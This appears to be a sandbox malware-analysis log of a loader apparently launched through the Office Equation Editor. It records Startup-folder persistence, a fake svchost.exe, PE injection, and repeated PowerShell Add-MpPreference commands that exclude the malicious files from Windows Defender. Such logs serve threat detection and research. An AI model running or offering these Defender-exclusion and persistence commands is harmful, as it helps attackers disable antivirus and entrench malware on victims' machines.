Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Memory written: C:\Users\user\AppData\Roaming\CTF loader_es.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Memory written: unknown base: 400000 value starts with: 4D5A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Queries volume information: C:\Users\user\AppData\Roaming\CTF loader_es.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Queries volume information: C:\Users\user\AppData\Roaming\CTF loader_es.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
